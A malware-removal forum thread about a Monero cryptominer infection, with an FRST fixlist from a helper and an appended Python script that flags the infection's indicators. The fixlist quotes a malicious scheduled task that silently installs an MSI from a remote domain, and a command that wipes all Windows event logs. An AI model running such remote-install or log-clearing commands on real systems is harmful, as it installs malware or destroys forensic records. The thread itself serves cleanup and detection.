donass, posted 21 December 2018

Hello everyone,

For the past few days my computer has literally been freezing at random moments (in safe mode it is fine). Malwarebytes, which I have installed, keeps detecting a virus named:

Quote:
Kategoria: Trojan
Domena: pool.monero.hashvault.pro
Adres IP: 37.187.163.200
Port: [49311]
Typ: Wychodzące
Plik: C:\Windows\SysWOW64\InstallShield\setup.exe

I read on Google that it is some kind of BitCoin miner? I have also just noticed that 2 cores are loaded to 100% (and I can hear the fans working harder when that happens). I checked this with a different program, pcrview, rather than the Task Manager built into Windows, because as soon as I open Task Manager the load drops, as if the virus deliberately shut itself down when Task Manager starts so that its running process could not be removed.

The process responsible for this load is at the path shown in the quote above, that is C:\Windows\SysWOW64\InstallShield\setup.exe; after I end it, it comes right back.

I am attaching logs (the scan was done in safe mode, because the computer hung when FRST was started in normal mode). Please help.

FRST.txt Shortcut.txt Addition.txt

jessica, posted 21 December 2018

Run FRST. Press CTRL+Y on the keyboard. Notepad will open; paste the following into it:

2018-12-11 11:12 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\C61WSASJA8
2018-12-11 11:12 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\wuma4pcz0ri
2018-12-11 11:08 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\6W9ROT2YPY
2018-12-11 11:08 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\jepesmqlhni
2018-12-11 11:05 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\SP243SXYIN
2018-12-11 11:05 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\i0alkiex4u0
2018-12-11 10:55 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\LGHNMQ7DFQ
2018-12-11 10:55 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\fo4dkoc2nsx
2018-12-11 10:54 - 2018-12-20 14:07 - 000000000 ____D C:\Program Files (x86)\foldershare
2018-12-11 10:54 - 2018-12-18 19:20 - 000000000 ____D C:\Program Files\OK0U934KFM
2018-12-11 10:54 - 2018-12-11 12:05 - 000000000 ____D C:\Users\pc\AppData\Roaming\h22rsvnb5ov
2018-12-11 10:54 - 2018-12-11 12:05 - 000000000 ____D C:\Program Files (x86)\FromAshes
2018-12-11 10:54 - 2018-12-11 10:54 - 000000003 _____ C:\Users\pc\AppData\Local\wbem.ini
2018-12-11 11:51 - 2018-12-11 11:57 - 000000004 _____ () C:\ProgramData\lock.dat
2018-12-11 11:51 - 2018-12-11 11:51 - 000000008 _____ () C:\ProgramData\ts.dat
1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\pc\LTLeeOi.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000186368 ____N (Microsoft Corporation) C:\Program Files (x86)\HFOyevDOOafRJ.exe
1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\pc\AppData\Local\yovaLIoYKRdHi.exe
Task: {81FE7175-84AC-4EC3-A193-BE691207220E} - System32\Tasks\{244EF55E-D569-E81D-0963-7EF90BE808AF} => "msiexec.exe" /i hxxps://refreshnerer711rb.info/41S0FPai.jiX /q
Task: {C3F98DE7-42ED-40F0-AEA9-39ADCDCEAC4E} - System32\Tasks\wufuc.{72EEE38B-9997-42BD-85D3-2DD96DA17307} => "C:\Windows\system32\rundll32.exe" "C:\Program Files\wufuc\wufuc64.dll",RUNDLL32_Start
C:\Program Files\wufuc
MSCONFIG\startupreg: 1492035 => "C:\Users\pc\AppData\Roaming\i0alkiex4u0\uuejapyf2uf.exe" /VERYSILENT
MSCONFIG\startupreg: 1883899 => "C:\Users\pc\AppData\Roaming\h22rsvnb5ov\inbpxzbkm5j.exe" /VERYSILENT
MSCONFIG\startupreg: 207368 => "C:\Users\pc\AppData\Roaming\fo4dkoc2nsx\y2kv0vkuh04.exe" /VERYSILENT
MSCONFIG\startupreg: 49QO9U23U0LOB8B => "C:\Program Files\C61WSASJA8\C61WSASJA.exe"
MSCONFIG\startupreg: 4Kzc'47yh+.exe => C:\Program Files\WhoCrashed\T3TD3C6NVVAPCLVHQDLCDUDAA4\4Kzc'47yh+.exe
C:\Users\pc\AppData\Roaming\i0alkiex4u0
C:\Users\pc\AppData\Roaming\h22rsvnb5ov
C:\Users\pc\AppData\Roaming\fo4dkoc2nsx
C:\Program Files\C61WSASJA8
C:\Program Files\WhoCrashed
MSCONFIG\startupreg: ANGTZQZB7DV29WT => "C:\Program Files\SP243SXYIN\N3KCVWNHD.exe"
MSCONFIG\startupreg: AVRZJBPC1A57AO6 => "C:\Program Files\OK0U934KFM\OK0U934KF.exe"
MSCONFIG\startupreg: DivineBird => "C:\Windows\rss\csrss.exe"
C:\Program Files\SP243SXYIN
C:\Program Files\OK0U934KFM
C:\Windows\rss\csrss.exe
MSCONFIG\startupreg: ZNBQ91HYXY2UALM => "C:\Program Files\LGHNMQ7DFQ\LGHNMQ7DF.exe"
C:\Program Files\LGHNMQ7DFQ
FirewallRules: [{B266D160-C354-4173-BBBC-03211E58D8F8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{20CE4732-3B1E-457A-9FE7-9A26DB9C5AE3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6BBAB765-BD10-4A97-BE44-54412A1E9703}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{93932677-51BB-4DBE-8096-FAA4E6C47E6F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{52398C9B-5132-42CD-A9C7-E905EE605D91}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7036998E-7DD4-46AE-B75B-27D06D7C4CFD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{AA08F4BD-087B-47AE-A094-22CB732C0A34}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1C9734EF-7E5D-4AC2-8012-D1D51C2B395D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FE6BE613-B773-4359-AFAC-FB1B4131C231}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{FCCBDFC4-A7B7-4B05-BC0A-06D9D99A31EA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4D4E0E09-7619-4452-B34B-0292199380D5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4F55ED3E-E6CA-4DCC-BC06-139849AEB788}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{4B637E1B-9058-4280-BFF2-9B5364A4C855}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{60E335A6-04B9-4C99-89D9-1240560BAB16}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A5AEF0B4-81F9-48AE-9FC2-BE03E80B95F1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{191272B5-8636-43E8-B25A-72AD5B806C68}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7D489058-EF9C-467C-B44E-176B90D71555}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3F8D75FF-A07B-4A1F-A4CE-B65FBBBA1E9E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{CCBFE6BF-1E21-421E-8E4F-8297F83F058B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FD3440DA-C0C8-4F84-BABC-48B3D9B472CA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{C9C964E9-91DE-4C1E-9295-1A2E6628C315}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{ECA63CE5-5502-4B30-AE27-02BEF71692CA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6C1E6D00-44D9-41A1-AEFC-91395FBED15D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{CBC7D6F0-E348-4483-9E16-9060F3A9D69F}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2BAB6FE1-79C3-445B-BBC6-E689D5E7575A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{092855A4-9A60-429D-B240-C7CA2205E02A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{621E7524-A500-4AD5-B715-2D99D9D65762}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F39804FF-704D-42FC-91AD-2E66587ACAD5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{273DFF5F-8FCA-4851-A652-C77FD54D5B9F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D418CD09-8191-4096-B8CF-C27CADB087E1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{9773C8C1-9D64-4AE9-89A0-C0D3501E0143}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{894738A4-F8DD-43F1-92B1-EA90F5411BB8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7FBB1656-D366-4AD1-8FCE-EA10B992F6C2}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{8D07C320-53E6-4137-AB37-9D79054DACE3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{77B4C10D-DD1F-4077-ACCA-C974D8272072}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5BE5EC97-226E-4EFC-93A3-91CA64FDDAAF}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{3BFB5F01-80B0-4448-8BD2-4F42C84E7CC2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{28776DB9-5ADA-4A7A-83D6-143793E5953F}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7E1EE1CE-AB30-4BDD-89C7-840152037D9B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{56AAB93C-970E-4B66-9508-A94265DDBFF1}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{850D06A3-146F-4CAC-94F4-76F8F737CBB3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{282F4459-4971-473B-92CE-3A56B0D8DD45}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{E0B10EC6-D91B-4493-AD12-B63A2166D8AB}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{365991E7-A2AC-43B2-8530-4588A16D2938}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1544557D-3AE1-484C-AC09-7C0CC07ACF35}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{228BF192-9235-444D-B3E1-F6D51E38019D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3567AC65-9820-4F70-8CC7-3FB3FBA1E76D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{366A2DCA-7B1F-4C36-BAAF-3EDC93DBF7B7}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{357635CF-2051-4D7A-833E-855DB08FDD8E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7007D27D-8D9F-4048-881D-17804F021DAE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{2094A8A7-938B-4267-850B-981DC42BA978}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0BF7F884-8F5D-4412-9FBD-670B5AABA472}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F540FF9F-9FC2-44FC-BB93-24C3BFE77D89}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F27A6A10-341A-4E95-BF42-E520A0B8EDA1}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{6DDF9E82-A539-4093-ADA8-9483E0EE906A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9F179B3A-9F90-4023-A276-910885D284A5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{3F5AEFA7-EF46-41EB-A6D1-8BB970B35023}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{21580474-CEC9-4A32-8225-4E39EAE946AD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1BB8C87D-D86D-44DE-A757-EBFC5772E930}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{36A2E25C-4F24-4688-8638-72FC233F7942}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F586D436-72A6-42D7-BEC8-7A9BBA528824}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{043E3B9B-7259-43D3-BE9D-F856154C139D}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{49F43CA6-0ABB-4B99-969F-662FE5ABE449}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{2DB22618-86A5-40C3-9F1F-757DDCF89236}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{9F1C3F5D-70E9-495C-9E7D-A5DF9F4B8DC8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{E460405A-5C3A-46EA-9D65-57C7A42BA600}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{DC432ADD-A6CE-437E-A129-7605A8AC89CC}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{BACEF838-AFA3-4358-851E-F9D32D6641A6}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{28E77A6B-B32B-4CF4-83E4-001CF5D6838B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F40B8917-34EE-4B97-A039-0F0F6D70FBA8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B5FEAAD9-B6C9-479E-8A5E-F67DC403C32E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A7F1FF60-28FC-4285-B2C5-C4DFAC66097E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{BA3F04A3-F6E5-486E-ADF1-992E048EEECF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D6B0F806-E39C-42D1-AA2B-3F595317E0E8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{438D2120-4134-4E85-9012-04C95A84E783}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{25AF8029-548C-45AB-9F6A-D5AEC4F0AC60}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7970BF22-578B-4A2D-A8E3-B10AEDA79BBA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{6F3AEEFA-532F-4090-AE21-F064F29365F5}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{789623AB-C41D-45BC-BD54-3F9B781E749B}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{5551595C-4C2F-40A3-A0A1-29C1FB77DDBE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7C5AB4FC-870A-4B83-91BB-2D7D4148A624}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{661C654F-6775-462F-9B3B-AF04691F6754}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D070C419-38C1-4352-A30A-9DFBEE56BFC8}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{A7E654F9-BE7E-4F84-9F35-E33DD0C90CD2}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{F95E2AB7-33D1-4C41-8097-98EF46EF1DC4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D7678B89-1FF3-4C97-A495-25AD05DE9AFD}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{538ADE50-5447-47E1-BCFD-2BBCC62387CB}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{4604E815-3014-4FFB-B557-971FA2CCC375}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{636CACB5-521E-4815-B762-AA6E502248AA}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FFF3B557-B880-4D57-ADF1-87D1141087CD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{0DABEEA8-3CC6-4F0C-B2E0-B10228F27B96}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8F18CB62-174E-4BA1-8500-5292EDBDFA00}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{0230D643-63FA-4E03-A437-E2D0F9535CF3}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{6CC0CBFF-FA1A-451D-B337-347743177C09}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{73C9471D-08EA-4C6B-AA82-74B1BD5591A7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{14FA0F86-0A65-41A8-B8D1-9031A84C9301}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{29D137FD-9C51-4653-8703-0420437A9E19}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7EB10A76-8F90-42C5-82A7-8AD25419AA7A}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{BB96A288-FAD2-40E6-A8A5-D21E54CA8658}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{C693FD23-65FE-45ED-8307-E87430E5B33E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{B526B7C2-76CF-481E-8AD0-2C7AF72DAD90}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{7BD4C720-A996-4A25-A6FD-F702419FCF12}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{314C90D1-73DA-42D3-A9C9-6D11AF15E309}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{831C1556-34CF-468A-9D57-79B21768315E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{EEE01EC0-C46F-4A57-B6DA-4CEAA60D0AD5}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7104B234-67DF-4CBD-8D66-1B2ACEE78A7E}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{31F96718-3485-4F77-9D1A-DF889E787DA4}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{D9BB50F6-F0B7-4BE4-8488-2467834DB29E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{7FFB158C-49AF-419E-A381-F3CCEE9B9E45}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AB7BFAB9-C9B2-40E9-AE67-6F4217323528}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{82B237CB-E80E-4613-A77D-91C8E6FD99BD}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{B42FD383-E478-4F2A-9BAA-94D2C146C142}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{21F7BB5D-EB38-44E8-BA1D-9E937C2997A5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FAAC1EFD-0C9E-4A2E-94A5-1B23580127EC}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{71169FAA-0980-4CC2-AFB0-9DE4F14DAEA3}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{FDBA4AB1-DA4A-48CE-8F14-16249C5EAAEE}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{1F923F65-2C65-46C7-92F6-273270F694F4}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{61E42A63-CBFA-4BF1-8BC8-50F947EDE9ED}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{53905476-8C38-412F-906B-C4A1E255F8CF}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{12E934D4-F3DE-4456-B474-CC1E8460D938}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{DCDE8369-5A54-46E6-84F3-29A311514921}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{AEB54C4D-36FF-49A3-B57C-296DCF543FA7}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{67BCBA00-5294-4CA6-B71E-1678B4516F5E}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{76BDEED2-CA46-4213-A0E5-BEA893C008F2}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{082E3529-645F-4173-BE54-5D95CB331E55}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{8AC3FE4B-6269-409A-989A-4F0C4387AF77}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{038E6342-7B21-44BC-827A-418C0C79BF67}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{F775CC4E-6438-48B6-A678-55763C23D4D5}] => (Allow) C:\Windows\SysWOW64\svchost.exe
FirewallRules: [{4B04F25F-0B19-486D-9427-A6F2509F4665}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
C:\Windows\SysWOW64\InstallShield\setup.exe
CHR HKLM\SOFTWARE\Policies\Google: Ograniczenia <==== UWAGA
FF Extension: (Brak nazwy) - C:\Program Files\Mozilla Firefox\browser\features\{A16C6B13-D41C-47BF-AAC2-FC71F1BB2363}.xpi [2018-12-11] [Brak podpisu cyfrowego]
S3 ALSysIO; \??\C:\Users\pc\AppData\Local\Temp\ALSysIO64.sys [X] <==== UWAGA
S3 catchme; \??\C:\ComboFix\catchme.sys [X]
S3 cpuz148; \??\C:\Windows\temp\cpuz148\cpuz148_x64.sys [X]
S3 GPU-Z; \??\C:\Users\pc\AppData\Local\Temp\GPU-Z.sys [X] <==== UWAGA
S3 MBAMFarflt; system32\DRIVERS\farflt.sys [X]
S3 MBAMWebProtection; system32\DRIVERS\mwac.sys [X]
ShortcutWithArgument: C:\Users\pc\Desktop\NACL Web Plug-in (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\Desktop\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Local\Google\Chrome\User Data\Default\Web Applications\_crx_pbdcmagkbhnjpjlnpibbmggikpedpilc\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\NACL Web Plug-in (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\NACL Web Plug-in (2).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Aplikacje Chrome\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\NACL Web Plug-in (1).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\NACL Web Plug-in.lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
ShortcutWithArgument: C:\Users\pc\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu\NACL Web Plug-in (2).lnk -> C:\Program Files (x86)\Google\Chrome\Application\chrome.exe (Google Inc.) -> --profile-directory=Default --app-id=pbdcmagkbhnjpjlnpibbmggikpedpilc
C:\Users\Public\Desktop\FxSound Enhancer.lnk
Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"}
EmptyTemp:

Press CTRL+S on the keyboard. In FRST, click Fix (NAPRAW). Generate new FRST logs.

jessi
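
An added example, not part of the thread: a Python triage pass that flags the kinds of entries appearing in the fixlist above (files stamped with the year 1601, a scheduled task running msiexec /i against a URL, /VERYSILENT autostarts from AppData, csrss.exe outside System32, and one program allowed by many firewall rules). The sample lines are constructed in the FRST format shown in the thread; the rule names, the `triage` function and the duplicate threshold are assumptions of this example.

```python
import re
from collections import Counter

# Constructed sample in the FRST line format shown in this thread; the names,
# GUIDs and URL are placeholders, not values taken from the user's machine.
SAMPLE = r'''
2018-12-11 10:54 - 2018-12-11 12:05 - 000000000 ____D C:\Program Files (x86)\ExampleApp
1601-01-03 21:26 - 1601-01-03 21:26 - 000073216 ____N (Microsoft Corporation) C:\Users\pc\AppData\Local\aBcDeFgH.exe
Task: {00000000-0000-0000-0000-000000000001} - System32\Tasks\{00000000-0000-0000-0000-000000000002} => "msiexec.exe" /i hxxps://download.example.invalid/pkg.msi /q
MSCONFIG\startupreg: 123456 => "C:\Users\pc\AppData\Roaming\abc123\xyz789.exe" /VERYSILENT
MSCONFIG\startupreg: Updater => "C:\Windows\rss\csrss.exe"
MSCONFIG\startupreg: Audio => "C:\Program Files\ExampleAudio\tray.exe"
FirewallRules: [{00000000-0000-0000-0000-00000000000A}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{00000000-0000-0000-0000-00000000000B}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{00000000-0000-0000-0000-00000000000C}] => (Allow) C:\Windows\SysWOW64\InstallShield\setup.exe
FirewallRules: [{00000000-0000-0000-0000-00000000000D}] => (Allow) C:\Program Files\ExampleAudio\tray.exe
'''.strip().splitlines()

# Assumption of this example: csrss.exe is only expected in System32.
SYSTEM_HOME = {"csrss.exe": r"c:\windows\system32"}

# "created - modified - size attributes [(company)] path"
FILE_RE = re.compile(r"^(\d{4})-\d\d-\d\d \d\d:\d\d - (\d{4})-\d\d-\d\d \d\d:\d\d"
                     r" - \d+ \S+ (?:\(.*?\) )?(.+)$")
TASK_RE = re.compile(r'^Task: .+ => "?msiexec(?:\.exe)?"?\s.*?/i\s+(?:https?|hxxps?)://', re.I)
START_RE = re.compile(r'^MSCONFIG\\startupreg: .+? => "?(.+?\.exe)"?(.*)$', re.I)
FW_RE = re.compile(r"^FirewallRules: \[\{[0-9A-Fa-f-]+\}\] => \(Allow\) (.+)$")


def triage(lines, dup_threshold=3):
    """Return (rule, detail) pairs for lines worth a closer look."""
    findings, fw_counts = [], Counter()
    for line in (raw.strip() for raw in lines):
        if m := FILE_RE.match(line):
            # 1601 is the zero point of Windows FILETIME, so a date there means
            # the timestamp was never set properly or was wiped.
            if int(m.group(1)) < 1980 or int(m.group(2)) < 1980:
                findings.append(("impossible-timestamp", m.group(3)))
        elif TASK_RE.match(line):
            findings.append(("task-remote-msi", line.split(" => ", 1)[1]))
        elif m := START_RE.match(line):
            path, args = m.group(1), m.group(2)
            folder, _, name = path.lower().rpartition("\\")
            if name in SYSTEM_HOME and folder != SYSTEM_HOME[name]:
                findings.append(("system-name-wrong-folder", path))
            elif "\\appdata\\" in path.lower() and "/verysilent" in args.lower():
                findings.append(("silent-autostart-from-appdata", path))
        elif m := FW_RE.match(line):
            fw_counts[m.group(1).lower()] += 1
    # The same binary allowed by many separate rules is unusual on its own.
    for path, count in fw_counts.items():
        if count >= dup_threshold:
            findings.append(("duplicate-firewall-allow", f"{path} x{count}"))
    return findings


if __name__ == "__main__":
    for rule, detail in triage(SAMPLE):
        print(f"{rule:32} {detail}")
```

A hit is a prompt for manual review, not a verdict; entries are removed only after someone has read the full log, as in the reply above.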